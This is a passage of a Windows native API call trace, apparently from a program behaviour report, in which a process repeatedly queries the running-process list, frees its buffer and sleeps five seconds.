NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0156.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0156.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0156.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.269] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0156.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0156.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0156.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0156.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0156.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0156.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.425] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0156.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0156.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0156.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0156.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0156.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0156.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.680] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0156.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0156.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0156.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0156.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0156.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0156.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0156.835] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0156.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0156.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0156.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0156.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0156.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0157.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.294] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0157.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0157.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0157.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0157.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0157.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0157.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.475] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0157.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0157.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0157.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0157.519] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0157.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0157.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0157.903] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0157.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0157.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0157.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0157.909] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0157.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0158.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.066] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0158.113] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0158.113] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0158.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0158.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0158.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0158.406] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.407] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0158.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0158.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0158.413] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0158.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0158.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0158.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.538] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0158.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0158.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0158.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0158.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0158.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0158.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.676] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0158.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0158.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0158.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0158.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0158.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0158.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0158.826] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0158.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0158.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0158.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0158.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0158.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0159.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0159.060] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0159.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0159.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0159.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0159.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0159.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0159.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0159.217] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0159.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0159.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0159.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0159.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0159.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0159.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0159.353] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0159.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0159.358] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0159.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0159.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0159.359] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0159.497] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0159.497] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0159.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0159.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0159.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0159.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0159.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0159.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0159.728] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0159.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0159.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0159.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0159.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0159.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0159.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0159.909] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0159.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0159.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0159.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0159.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0159.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0160.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0160.054] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0160.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0160.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0160.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0160.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0160.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0161.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.172] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0161.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0161.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0161.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0161.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x800000, RegionSize=0xdea50*=0x20000) returned 0x0 [0161.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0x0 [0161.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0161.465] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0161.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x800000, RegionSize=0xdea64*=0x10000) returned 0x0 [0161.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x800000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x800000, ResultLength=0x0) returned 0xc0000004 [0161.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x800000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0161.523] 